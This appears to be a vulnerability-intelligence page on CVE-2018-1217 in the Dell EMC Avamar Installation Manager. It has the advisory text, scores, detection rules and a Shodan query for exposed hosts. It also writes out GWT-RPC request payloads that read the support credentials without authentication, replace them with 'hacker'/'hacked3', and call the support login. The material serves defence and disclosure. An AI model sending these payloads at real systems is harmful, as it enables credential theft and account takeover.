CVE-2018-1217
published 2018-04-09CVE-2018-1217: Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a…
PriorityP188critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
46.64%
98.7th percentile
Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dell | emc_avamar | — | — |
| dell | emc_avamar | — | — |
| dell | emc_avamar | — | — |
| dell | emc_integrated_data_protection_appliance | — | — |
| dell | emc_integrated_data_protection_appliance | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command7|0|6|https://{{Hostname}}/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|{{Hostname}}|1|2|3|4|2|5|5|6|0|↗
command7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611||{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7|↗
command7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611||1|2|3|4|3|5|5|5|6|0|7|↗
sigma↗
contains_all(body, "//OK", "emcsupportUsername", "emcsupportPassword") AND status_code == 200
- →Alert on HTTP 200 responses from /avi/avigui/avigwt that contain both '//OK' and 'emcsupportUsername' and 'emcsupportPassword' in the body — this indicates successful credential exfiltration. ↗
- →The GWT serialization token '60AF6BC6976F9B1F05AC454813F5324D' appears in all exploit payloads targeting this vulnerability and can be used as a network signature. ↗
- →Monitor for the GWT RPC service name 'com.avamar.avinstaller.gwt.shared.AvinstallerService' in HTTP POST body to /avi/avigui/avigwt from unauthenticated sessions (no valid session cookie). ↗
- →Shodan query 'title:"AVAMAR"' can be used to identify internet-exposed Avamar Installation Manager instances potentially vulnerable to this CVE. ↗
- →Tampered/injected GWT response body '//OK[1,["true"],0,7]' for the supportLogin method can be used to detect response-tampering attacks (e.g., via proxy) that unlock the support account. ↗
- ·The vulnerability requires no authentication; any network-level control blocking unauthenticated access to /avi/avigui/avigwt will mitigate exploitation. Credentials are returned in plaintext in the HTTP response body. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6583-rv3q-95pf: Avamar Installation Manager in Dell EMC Avamar Server 7
ghsa_unreviewed·2022-05-13
CVE-2018-1217 [CRITICAL] GHSA-6583-rv3q-95pf: Avamar Installation Manager in Dell EMC Avamar Server 7
Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.
VulnCheck
dell emc_avamar Missing Authorization
vulncheck·2018·CVSS 9.8
CVE-2018-1217 [CRITICAL] dell emc_avamar Missing Authorization
dell emc_avamar Missing Authorization
Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.
Affected:
No detection rules found.
Exploit-DB
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
exploitdb·2018-04-10·CVSS 9.8
CVE-2018-1217 [CRITICAL] Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
---
# Exploit Title: [Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)]
# Date: [24/11/2017]
# Exploit Author: [SlidingWindow]
# Vendor Homepage: [https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/DELL EMC-Avamar-Virtual-Edition]
# Version: [Dell EMC Avamar Server 7.3.1 , Dell EMC Avamar Server 7.4.1, Dell EMC Avamar Server 7.5.0, Dell EMC Integrated Data Protection Appliance 2.0, Dell EMC Integrated Data Protection Appliance 2.1]
# Tested on: [Dell EMC Avamar Virtual Edition version 7.5.0.183]
# CVE : [CVE-2018-1217]
#Product:-
EMC Avamar Virt
Nuclei
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
nuclei·CVSS 9.8
CVE-2018-1217 [CRITICAL] Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, imperson
2018-04-09
Published
Exploited in the wild